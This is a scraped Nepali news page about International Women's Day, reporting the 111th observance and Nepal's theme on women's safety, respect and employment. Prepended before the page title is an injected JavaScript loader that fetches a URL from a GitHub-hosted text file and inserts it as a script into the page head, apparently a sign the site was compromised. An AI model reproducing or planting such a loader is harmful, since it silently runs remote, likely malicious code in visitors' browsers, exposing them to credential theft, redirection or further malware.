;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आज अन्तराष्ट्रिय महिला दिवास मनाइदै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • आज अन्तराष्ट्रिय महिला दिवास मनाइदै
अन्तर्राष्ट्रिय

आज अन्तराष्ट्रिय महिला दिवास मनाइदै

फागुन २४,

काठमाडौं  । आज १११ औं अन्तर्राष्ट्रिय महिला दिवस मनाइदै छ । हरेक वर्ष ८ मार्चलाई अन्तर्राष्ट्रिय महिला दिवसको रूपमा मनाइदै आइएको छ ।

यो वर्ष “महिलाको सुरक्षा, सम्मान र रोजगारः समृद्ध नेपालको आधार” भन्ने राष्ट्रिय संकल्पका साथ नेपाल सहित विश्व भरि यो दिवास मनाइदै छ । अन्तर्राष्ट्रिय महिला दिवस महिला जागरूकताको दिवस पनि हो ।

आजका दिन संसारभरि विभिन्न कार्यक्रमहरु गरेर सामाजिक, आर्थिक लगायत विकासका अन्य धेरै आयामहरुमा नारीहरुको सक्रिय सहभागीता अनि नेतृत्वको प्रशंसा गरिन्छ ।

आज देशभरी महिला अधिकार कर्मी, संघसंस्थाहरुले विभिन्न कार्यक्रम गरि दिवास मनाउदै छन् ।

फेसबुक प्रतिक्रियाहरु